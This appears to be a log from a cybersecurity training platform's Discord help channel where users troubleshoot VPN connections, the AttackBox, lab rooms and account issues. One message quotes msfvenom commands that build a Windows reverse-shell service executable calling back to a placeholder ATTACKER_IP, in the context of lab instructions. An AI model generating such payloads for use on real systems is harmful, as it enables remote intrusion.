im facing issues with my openvpn too, when i try to get eu1 and eu2 working , its exiting with a fatal error, eu3 is just "repeating" itself (like the other servers) - the THM Troubleshooting script does help, it does connect me to the network. the network seems way too slow tho , even with an eu server. did try the Mr Robot CTF Machine, website was infinitly loading, --> possible spoiler|| /robots.txt did work tho - downloading the needed files didnt || , when i hit up 10.10.10.10 it shows me that im connected. i cant do any machine like this

neon loom
#

Not entirely sure its what your dealing with, but it may help.

craggy canopy
#

10.10.10.10 works, but when i try to view the "normal" webpage, its "waiting for 10.10.xxx") the entire time :l

neon loom
#

I know nothing about the Mr Robot CTF machine, so I am no healp there. I am glad you got connected successfully to the openVPN though!

warped pivot
#

I posted this to room-help but not sure if Try Hack Me support folks monitor that so posting here also

Hello, I am posting about the Caldera Room. There are several areas that are not aligned with the questions or are not working. Examples:

  1. In Task 5 - Emulation to Detection, this question "During the execution of the first ability, what is the title of the Sigma rule that flagged the usage of Invoke-WebRequest?" expects the answer "PowerShell Web Download", yet there are no Aurora logs that have that message. It looks like the AuroraAgent Sigma rules have been updated but the questions and answers have not. The current Sigma rule (the rule title) is " Usage Of Web Request Commands And Cmdlets "
  2. I have done the creation of the Custom Caldera Ability several times and it does not run in Caldera. I have run the command manually on the Windows system and I can see the connections to the python3 http.server but there are no AuroraAgent messages generated therefore I am unable to get the answer for the last question of Task 5 (without searching the Internet for it - I did find the answer). If logs had gotten generated I would have easily been able to find the answer.

Bottom line is that this entire room needs to be reviewed and updated to make it work properly

rich tapir
#

so im unsure why but when i load the green button start attackbox it gives me this screen

#

did i do something wrong here @_@

ivory spruce
#

The box shown on the right seems to be the target VM and you'll have to click on the tab on the left for the Attackbox.

rich tapir
#

u know the blue button i pushed it first, sent me to the vm, then i tapped the green button

#

sent me the black terminal screen

rich tapir
#

omg

#

thank you

#

@_@ i got worried

#

copy that

torn sage
#

Hello I keep receiving unable to connect in firefox after putting my attack machine address even though I'm connected to openvpn in virtual box kali

ivory spruce
ivory spruce
naive dust
#

I was installing the nethunter app on my Android 14 amd followed all of the steps and ensured all inf was correct but still got thos error message. Can someone help me resolve this?

Error!
Connection failed.
Connection to VNC server failed with reason: localhost
Jjava.net.UnknowntostException: localhost at
Java.net.AbstractPlainSocketImpl.connect(AbstractPlai
nSocketImpl.java:20&) at
java.net.SocksSocketImpl.connect(SocksSocketImpl.jav
a:436) at java.net.Socket.connect (Socket.java:646) at
com.liordanov.bVC.RfbProto.initSocket (RfbProto.java:4
00) at
com.iiordanov.bVNC.RfbProto.initializeAndAuthenticate
(RfbProto.java:456) at
com.liordanov.bVNC.protocol.RemoteVncConnection.start
VncConnection (RemoteVncConnection.kt:/16) at
OK

weary spindle
#

Maybe you need to get around it

sweet forge
sweet forge
tawdry mauve
#

how can i verify myself

west chasmBOT
wind wedge
cyan shell
#

Hey everyone. I was going through the Compromising AD rooms but the Lateral Movement & Pivoting room is stuck on resetting can anyone help get this working?

brittle pier
#

Just wanted to drop a note in that the rooms including msfvenom seem to be using outdated, and in todays standard, incomplete commands. It seems to be using the older syntax for setiting parameters on generated payloads, which is -p -f and -o.

This will present warnings about a number of parameters not being set, including architecture type, encoding and platform. Henceforth, forcing msfvenom to apply its own defaults, which could cause issues to those that aren't any of the wiser to the issue.

An example of the older style found in THM rooms:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe

Whereas the new style would be similar to:
msfvenom -a x64 --platform Windows -p windows/x64/shell/reverse_tcp LHOST=ATTACKER_IP LPORT=4445 --format=exe-service -b <encoding> -o rev-sync.exe

Thank you for listening to my ramblings tipsfedora

eternal forum
#

why its showing 1 day streak

#

yesterday it was 19 and now its 1 🤔

halcyon condor
#

When I use sudo openvpn [filename].ovpn on Kali Linux, I get certificate verification errors. How do I fix this?

west chasmBOT
wind wedge
#

Can you verify and show a screenshot of your output please

halcyon condor
weary spindle
halcyon condor
#

I don't know.

weary spindle
#

Which country and which server are you tyring?

halcyon condor
#

EU-Regular-3

weary spindle
#

Try 1 or 2 please. 🙂

halcyon condor
#

Alright

#

ty

zinc pier
#

heyy

sorry if it is a stupid question, but what do I need my discord token for?